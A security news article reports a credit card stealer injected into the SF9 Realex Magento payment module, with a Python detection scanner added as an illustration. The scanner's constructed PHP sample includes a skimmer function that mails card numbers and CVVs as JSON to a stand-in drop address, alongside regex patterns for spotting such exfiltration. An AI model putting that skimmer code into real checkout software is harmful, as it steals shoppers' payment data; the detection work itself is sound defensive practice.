E-commerce sites built on the Magento platform face a continuing battle against attacks. Security researchers have found a malicious function inside one of the platform's modules that steals credit card information.
Malicious code was injected into the PHP files of SF9 Realex, a module that lets sites store customer credit card data for one-click checkout by repeat customers. It integrates with the Realex RealAuth Remote and Redirect systems and is a very popular solution in the Magento community. The malicious function was found by Bruno Zanelato of security firm Sucuri.
The malicious function sendCCNumber() reroutes credit card information entered by a customer to an attacker's email address, which is hidden in a variable later in the code. The data, encoded as JSON, arrives in the attacker's inbox without the victim being any the wiser.
The attacker also uses binlist.net, a public web service for looking up issuer identification numbers (IINs), to identify the bank each card is associated with.
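The behaviour described above gives a site owner something concrete to check for: module files whose hash has drifted from a known-good baseline, and PHP source that reads card fields and hands JSON-encoded data to mail() or an outbound HTTP call. The following added example (not code from Sucuri or the SF9 Realex project) implements that check over constructed sample sources; the file path and the indicator patterns are assumptions for illustration.

```python
import re
from hashlib import sha256

# Constructed sample: a clean payment module and the same file with an injected mailer.
# (Class and path names are hypothetical, not the real module's.)
CLEAN_PHP = """<?php
class SF9_Realex_Model_Payment {
    public function authorize($payment, $amount) {
        return $this->_gateway->authorize($payment, $amount);
    }
}
"""
INJECTED_PHP = CLEAN_PHP + """
function sendCCNumber($payment) {
    $data = array('num' => $payment->getCcNumber(), 'cvv' => $payment->getCcCid());
    $to = "drop" . "@" . "example.invalid";   // recipient assembled late in the code
    mail($to, "cc", json_encode($data));
}
"""
SAMPLE_PATH = "app/code/local/SF9/Realex/Payment.php"  # hypothetical path

# Heuristic indicators derived from the reported stealer's behaviour.
INDICATORS = {
    "mail_json_exfil": re.compile(r"mail\s*\([^;]*json_encode"),
    "cc_field_access": re.compile(r"getCc(?:Number|Cid|ExpMonth|ExpYear)|cc_(?:number|cid)"),
    "binlist_lookup": re.compile(r"binlist\.net"),
    "outbound_http": re.compile(r"curl_exec|file_get_contents\s*\(\s*['\"]https?://"),
}

def scan_source(src: str) -> list[str]:
    """Return the indicator names matched in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]

def baseline(files: dict[str, str]) -> dict[str, str]:
    """sha256 per file; in practice taken from a clean module checkout."""
    return {path: sha256(body.encode()).hexdigest() for path, body in files.items()}

def audit(files: dict[str, str], known_good: dict[str, str]) -> dict[str, dict]:
    """Flag files that drifted from baseline or match any indicator."""
    findings = {}
    for path, body in files.items():
        changed = known_good.get(path) != sha256(body.encode()).hexdigest()
        hits = scan_source(body)
        if changed or hits:
            findings[path] = {"modified": changed, "indicators": hits}
    return findings

if __name__ == "__main__":
    good = baseline({SAMPLE_PATH: CLEAN_PHP})
    print(audit({SAMPLE_PATH: INJECTED_PHP}, good))
```

Hash drift alone catches a legitimate module update as well, so the indicator hits are what separate a patch from an injection; review any flagged file by hand before restoring it from a clean copy.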
Attackers will certainly get bolder in targeting credit card data on e-commerce platforms such as Magento.
The trend is on the rise and currently focuses on Magento, but it could affect any e-commerce platform in the future.
As Zanelato pointed out, no vulnerability in Magento itself enabled the theft of credit card data. Instead, the attacker exploited a different, unnamed vulnerability in the website hosting the e-commerce platform, which let them inject the malicious code and take over SF9 Realex.
This is the latest in a line of credit card stealers that Sucuri researchers have observed taking advantage of Magento.
Last summer, Cesar Anjos, a researcher with the firm, analyzed one stealer that was loaded from an external source. It essentially performed a man-in-the-middle attack between the user and the checkout page after credit card information was entered. Last October, Ben Martin, another researcher with the firm, found attackers scraping credit card numbers and exfiltrating them in obscure, sometimes publicly viewable, image files.
Researchers with RiskIQ monitored attacks similar to the ones described by Sucuri last year. The firm said the attacks it had been monitoring originated from a single hacking group that targeted e-commerce platforms such as Powerfront CMS and OpenCart with a web-based keylogger in March 2016.